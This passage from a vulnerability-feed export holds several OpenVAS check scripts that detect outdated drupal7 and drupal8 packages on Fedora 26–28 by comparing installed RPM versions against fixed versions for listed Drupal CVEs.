This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875500\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-08 04:12:02 +0100 (Fri, 08 Mar 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-6a0717dc9a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6a0717dc9a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal8' package(s) announced via the FEDORA-2019-6a0717dc9a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.10~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-8fd924a53d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_8fd924a53d_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-8fd924a53d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 05:53:29 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-8fd924a53d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-7d748596e9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310814523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d748596e9_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-7d748596e9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814523\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:36 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-7d748596e9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d748596e9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2018-7d748596e9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-79bd99f9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-6341", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875534", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875534\");\n script_version(\"2019-04-03T06:51:54+0000\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-79bd99f9a8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-79bd99f9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-79bd99f9a8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.13~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-6e6d8c314b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874382", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_6e6d8c314b_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874382\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:05 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-6e6d8c314b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSND764JDPO7QHXKOFVZCECOMLR3N6L\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.6~3.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7600", "CVE-2019-10911", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-10910", "CVE-2019-10909", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310876320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876320", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876320\");\n script_version(\"2019-05-17T10:04:07+0000\");\n script_cve_id(\"CVE-2019-10909\", \"CVE-2019-10910\", \"CVE-2019-10911\", \"CVE-2019-11358\", \"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:04:07 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-08 02:09:58 +0000 (Wed, 08 May 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3edd7e8a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-1a3edd7e8a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 